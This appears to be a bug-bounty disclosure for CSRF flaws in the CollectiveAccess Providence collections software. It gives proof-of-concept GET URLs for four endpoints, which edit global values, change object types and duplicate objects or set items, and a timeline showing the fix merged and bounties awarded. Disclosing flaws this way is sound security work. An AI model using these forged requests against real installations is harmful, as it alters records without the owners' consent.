Cross-Site Request Forgery (CSRF) in collectiveaccess/providence


Reported on

Sep 26th 2021


I have found more endpoints which allow edit/duplicate were not protected from CSRF, the following endpoints are:

1: Edit Global Value in Pawtucket.

2: Change object type.

3: Duplicate object.

4: Duplicate items in the set and add to another set.

Proof of Concept

Via GET requests:
1. http://[URL]/providence/index.php/manage/Pawtucket/saveGlobalValues?_formName=globalValuesForm&form_timestamp=1632635941&hours_of_operation=ABC

2. http://[URL]/providence/index.php/editor/objects/ObjectEditor/ChangeType?_formName=caChangeTypeForm&form_timestamp=1632633565&type_id=23&object_id=7

3. http://[URL]/providence/index.php/editor/objects/ObjectEditor/Edit?_formName=DuplicateItemForm&object_id=34&mode=dupe

4. http://[URL]/providence/index.php/manage/sets/SetEditor/DuplicateItems?_formName=caDupeSetItemsForm&form_timestamp=1632634975&setForDupes=new&set_id=2


Compromise on the integrity and availability of objects.


For 3. Duplicate objects/sets

For 4. Duplicate Items in sets

For 1. Edit Global Value in Pawtucket

For 2. Change Type of Object

We have contacted a member of the collectiveaccess/providence team and are waiting to hear back a year ago
CollectiveAccess validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
CollectiveAccess confirmed that a fix has been merged on 23bb11 a year ago
CollectiveAccess has been awarded the fix bounty
displayHelpers.php#L1207 has been validated
displayHelpers.php#L1514 has been validated
change_type_html.php#L58 has been validated
a year ago

It is very interesting that you invalidated my reports but accepted this one !! :|

a year ago

@admin and @maintainer really Why this is happen ??

to join this conversation